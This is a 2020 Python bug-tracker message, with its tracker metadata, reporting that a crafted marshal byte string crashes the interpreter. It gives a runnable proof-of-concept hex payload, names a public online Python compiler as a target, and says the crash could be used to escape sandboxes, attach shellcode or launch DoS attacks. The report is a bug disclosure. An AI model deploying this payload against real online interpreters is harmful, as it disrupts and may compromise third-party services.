Message373557
There are many online Python interpreters, we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as their fully trust that Python doesn't generate segfault.
For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though, they have protection mechanisms for file access and many other things.
-----------
https://www.programiz.com/python-programming/online-compiler/
-----------
import io
import marshal
hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)
print(data)
print('We have segfault but we cannot see!')
------------------- |
|
Date |
User |
Action |
Args |
2020-07-12 14:45:23 | Iman Sharafaldin | set | recipients:
+ Iman Sharafaldin, vstinner, christian.heimes, serhiy.storchaka |
2020-07-12 14:45:23 | Iman Sharafaldin | set | messageid: <1594565123.06.0.21254483975.issue41208@roundup.psfhosted.org> |
2020-07-12 14:45:23 | Iman Sharafaldin | link | issue41208 messages |
2020-07-12 14:45:22 | Iman Sharafaldin | create | |
|